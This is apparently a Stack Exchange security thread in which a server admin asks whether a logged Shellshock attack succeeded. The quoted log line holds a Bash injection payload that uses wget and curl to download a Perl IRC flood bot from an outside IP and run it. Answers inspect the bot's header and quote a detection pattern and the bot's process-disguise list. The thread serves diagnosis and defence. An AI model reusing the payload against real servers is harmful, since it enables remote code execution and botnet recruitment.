# Did this ShellShock exploit work?

Tags: webserver, shellshock

Looking through my web server logs, I noticed two different ShellShock attacks on my server, both of which generated a HTTP 200 OK response code. They look like this (IP address/date and time redacted):

```
223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/  ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/  ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""
```

My bash version is 4.2.37 and we do regularly update this server through `apt-get update && apt-get dist-upgrade` along with daily log file analysis. Apache 2.2.22 is being used and only port 80 is open. The file downloaded appears to be a IRC script which I can only imagine is used for flooding purposes in this context.

Trying to run `x='() { :;}; echo VULNERABLE' bash -c :` (from [Is there a short command to test if my server is secure against the shellshock bash bug?](https://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b)) returns nothing but running `ps -p $$` from a SSH terminal shows a bash shell currently in use.

The question is that is it likely that the exploit worked given the above?

Comment: What do you think that running `ps -p $$` is doing? As nearly as I can figure out it is telling `ps` to print information about the SSH shell that you are in. What has that to do with ShellShock?

Comment: You could run `who` for looking about user connected to your server.

Comment: ... Go to http://tldp.org/, in *Guides* index, search for *System Administrators*! Enjoy reading!

Comment: @NeilSmithline I wanted to prove that I was running a bash shell instance and was more puzzled over why running the `x='() { :;}; echo VULNERABLE' bash -c :` printed nothing. If it came back I was running sh or similar, then this question wouldn't have been raised.

Answer (score 2, accepted):

There's no way to tell from the logfile alone.  The "200 OK" response just means your webserver is running and has an index page at "/" -- something true of almost every webserver in the world.

If `x='() { :;}; echo VULNERABLE' bash -c :` doesn't print the word `VULNERABLE`, you almost certainly aren't vulnerable.

Comment: Careful here! Shellshock is not a vulnerability, it's a **collection of vulnerabilities**. You can be immune from one but not the next one. Also, many people consider that the fact `() { foo }` can define a function IS already a vulnerability, as the attacker doesn't need to control the variable name.

Comment: In addition the remote exploit required the use of the mod_fastcgi module be loaded within Apache as it was actively passing data through /bin/bash triggering allowing for an exploit to occur within the context of the running service, in this case apache.

Answer (score 1):

This is an old perl irc bot:

> `... ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;c...`

At time I write this, I already do the `wget` and some inspection:

```
cd /tmp
wget 85.214.60.234/den
sed -e 's/^\(.\{78\}\).*/\1/;12q' den
#!/usr/bin/perl

##############################################################################
##############################################################################
## JST Perl IrcBot v3.0 / 2011 by FrankBlack @ Millenium Group ## [ Help ] ###
##      Stealth MultiFunctional IrcBot writen in Perl          ###############
##        Teste on every system with PERL instlled             ##  !u @system 
##                                                             ##  !u @version
##     This is a free program used on your own risk.           ##  !u @channel
##        Created for educational purpose only.                ##  !u @flood  
## I'm not responsible for the illegal use of this program.    ##  !u @utils  
##############################################################################
```

Well this old script do some self hidding and a lot of things under remote control through external IRC server.

I already wrote a *not perfect* [DDos Perl IrcBot Killer](http://f-hauri.ch/vrac/ddosIrcBotPerlKiller_pl.txt), which work perfectly with **this** version.

Have a look at line 61 and 62 of my script:

```
61          m+^(/usr)?(/local)?(/s?bin)?[\[/]?(http|ssh|apache|syslog|cron|klog|kblockd|khelper|kmpathd|ksoftirqd|acpi|sync|-)+;
62  #       m+^(/usr)?(/local)?(/s?bin)?[\[/]?([a-z0-9-]\+)+;
```

and lines 31 to 38 from *den* version:

```
31  my @rps = ("/usr/local/apache/bin/httpd -DSSL",
32                     "/usr/sbin/httpd -k start -DSSL",
33             "/usr/sbin/httpd",
34             "/usr/sbin/apache2 -k start",
35                 "/sbin/syslogd",
36                 "/sbin/klogd -c 1 -x -x",
37                     "/usr/sbin/acpid",
38                     "/usr/sbin/cron");
```

So I could ensure (**today**), my script will find and kill this *virus*.